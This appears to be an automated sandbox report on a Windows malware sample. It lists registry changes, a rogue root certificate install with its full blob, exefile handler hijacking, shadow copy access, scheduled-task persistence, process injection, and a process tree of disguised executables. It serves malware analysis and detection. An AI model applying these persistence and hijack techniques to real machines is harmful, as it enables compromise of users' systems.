Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 35320 systeminfo.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5160 vssadmin.exe 3656 vssadmin.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings fuag.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings Photos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" dxwebsetup.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings wmisecure64.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 8264 reg.exe 31664 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 43412 Process not Found 36428 Process not Found 14228 Process not Found -
Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2600 schtasks.exe 1860 schtasks.exe 14480 Process not Found 8012 schtasks.exe 33336 schtasks.exe 22388 schtasks.exe 15028 Process not Found 41260 schtasks.exe 22616 schtasks.exe 38936 Process not Found 9888 Process not Found 18316 schtasks.exe 18176 schtasks.exe 29004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 3788 powershell.exe 3788 powershell.exe 3788 powershell.exe 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 2904 powershell.exe 2904 powershell.exe 1188 def.exe 1188 def.exe 1188 def.exe 1188 def.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe 4460 powershell.exe 4460 powershell.exe 4460 powershell.exe 3468 powershell.exe 3468 powershell.exe 3468 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 2376 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3100 wmisecure64.exe 2936 4363463463464363463463463.exe 3556 Explorer.EXE -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 3728 sysvplervcs.exe 37816 sysvplervcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2936 4363463463464363463463463.exe Token: SeDebugPrivilege 1536 tasklist.exe Token: SeDebugPrivilege 4268 tasklist.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeBackupPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeBackupPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeDebugPrivilege 1188 def.exe Token: SeBackupPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeBackupPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 4764 XClient.exe Token: SeDebugPrivilege 2576 MSBuild.exe Token: SeBackupPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeDebugPrivilege 4460 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4764 XClient.exe Token: SeDebugPrivilege 652 937727480.exe Token: SeBackupPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeBackupPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeSecurityPrivilege 1380 87Zvwj4Zse.exe Token: SeBackupPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeSecurityPrivilege 2576 MSBuild.exe Token: SeDebugPrivilege 2476 build.exe Token: SeAssignPrimaryTokenPrivilege 2476 build.exe Token: SeTakeOwnershipPrivilege 2476 build.exe Token: SeDebugPrivilege 2548 winn.exe Token: SeBackupPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe Token: SeSecurityPrivilege 4276 xSzEYbwSa1.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 9252 config.exe 9252 config.exe 9252 config.exe 9252 config.exe 28984 x715467.dat 30020 x715467.dat 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1012 Mph.pif 1012 Mph.pif 1012 Mph.pif 9252 config.exe 9252 config.exe 9252 config.exe 9252 config.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe 30268 dwm.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 4764 XClient.exe 9252 config.exe 9252 config.exe 28708 Client.exe 12256 Conhost.exe 12032 up.exe 5680 Conhost.exe 7024 Conhost.exe 6872 hbfgjhhesfd.exe 25260 Conhost.exe 36636 Conhost.exe 3236 Conhost.exe 3036 Conhost.exe 42128 Conhost.exe 3472 Conhost.exe 35868 fuag.exe 15912 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2936 wrote to memory of 4880 2936 4363463463464363463463463.exe 87 PID 2936 wrote to memory of 4880 2936 4363463463464363463463463.exe 87 PID 2936 wrote to memory of 4880 2936 4363463463464363463463463.exe 87 PID 4880 wrote to memory of 3428 4880 OfferedBuilt.exe 90 PID 4880 wrote to memory of 3428 4880 OfferedBuilt.exe 90 PID 4880 wrote to memory of 3428 4880 OfferedBuilt.exe 90 PID 2936 wrote to memory of 2808 2936 4363463463464363463463463.exe 96 PID 2936 wrote to memory of 2808 2936 4363463463464363463463463.exe 96 PID 2936 wrote to memory of 2808 2936 4363463463464363463463463.exe 96 PID 3428 wrote to memory of 1536 3428 cmd.exe 97 PID 3428 wrote to memory of 1536 3428 cmd.exe 97 PID 3428 wrote to memory of 1536 3428 cmd.exe 97 PID 3428 wrote to memory of 1680 3428 cmd.exe 98 PID 3428 wrote to memory of 1680 3428 cmd.exe 98 PID 3428 wrote to memory of 1680 3428 cmd.exe 98 PID 2936 wrote to memory of 1752 2936 4363463463464363463463463.exe 99 PID 2936 wrote to memory of 1752 2936 4363463463464363463463463.exe 99 PID 2936 wrote to memory of 1752 2936 4363463463464363463463463.exe 99 PID 3428 wrote to memory of 4268 3428 cmd.exe 100 PID 3428 wrote to memory of 4268 3428 cmd.exe 100 PID 3428 wrote to memory of 4268 3428 cmd.exe 100 PID 3428 wrote to memory of 3024 3428 cmd.exe 101 PID 3428 wrote to memory of 3024 3428 cmd.exe 101 PID 3428 wrote to memory of 3024 3428 cmd.exe 101 PID 3428 wrote to memory of 3040 3428 cmd.exe 102 PID 3428 wrote to memory of 3040 3428 cmd.exe 102 PID 3428 wrote to memory of 3040 3428 cmd.exe 102 PID 3428 wrote to memory of 4980 3428 cmd.exe 103 PID 3428 wrote to memory of 4980 3428 cmd.exe 103 PID 3428 wrote to memory of 4980 3428 cmd.exe 103 PID 3428 wrote to memory of 3964 3428 cmd.exe 104 PID 3428 wrote to memory of 3964 3428 cmd.exe 104 PID 3428 wrote to memory of 3964 3428 cmd.exe 104 PID 3428 wrote to memory of 1012 3428 cmd.exe 107 PID 3428 wrote to memory of 1012 3428 cmd.exe 107 PID 3428 wrote to memory of 1012 3428 cmd.exe 107 PID 3428 wrote to memory of 1532 3428 cmd.exe 109 PID 3428 wrote to memory of 1532 3428 cmd.exe 109 PID 3428 wrote to memory of 1532 3428 cmd.exe 109 PID 1752 wrote to memory of 1404 1752 1.exe 108 PID 1752 wrote to memory of 1404 1752 1.exe 108 PID 1752 wrote to memory of 1404 1752 1.exe 108 PID 1012 wrote to memory of 2600 1012 Mph.pif 110 PID 1012 wrote to memory of 2600 1012 Mph.pif 110 PID 1012 wrote to memory of 2600 1012 Mph.pif 110 PID 1404 wrote to memory of 4612 1404 sysklnorbcv.exe 114 PID 1404 wrote to memory of 4612 1404 sysklnorbcv.exe 114 PID 1404 wrote to memory of 4612 1404 sysklnorbcv.exe 114 PID 1404 wrote to memory of 4848 1404 sysklnorbcv.exe 116 PID 1404 wrote to memory of 4848 1404 sysklnorbcv.exe 116 PID 1404 wrote to memory of 4848 1404 sysklnorbcv.exe 116 PID 4848 wrote to memory of 4248 4848 cmd.exe 120 PID 4848 wrote to memory of 4248 4848 cmd.exe 120 PID 4848 wrote to memory of 4248 4848 cmd.exe 120 PID 4612 wrote to memory of 3788 4612 cmd.exe 121 PID 4612 wrote to memory of 3788 4612 cmd.exe 121 PID 4612 wrote to memory of 3788 4612 cmd.exe 121 PID 4848 wrote to memory of 4628 4848 cmd.exe 122 PID 4848 wrote to memory of 4628 4848 cmd.exe 122 PID 4848 wrote to memory of 4628 4848 cmd.exe 122 PID 4848 wrote to memory of 2992 4848 cmd.exe 123 PID 4848 wrote to memory of 2992 4848 cmd.exe 123 PID 4848 wrote to memory of 2992 4848 cmd.exe 123 PID 4848 wrote to memory of 3760 4848 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1cc5b767-3eb2-4996-804c-cb5134254f20}2⤵PID:41228
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1144 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2816
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵
- Executes dropped EXE
PID:10336
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:9100
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:17284
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵
- Executes dropped EXE
PID:16940
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:15524
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11020
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵
- Executes dropped EXE
PID:24376
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3896
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:29040
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:32136
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:35120
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:37580
-
-
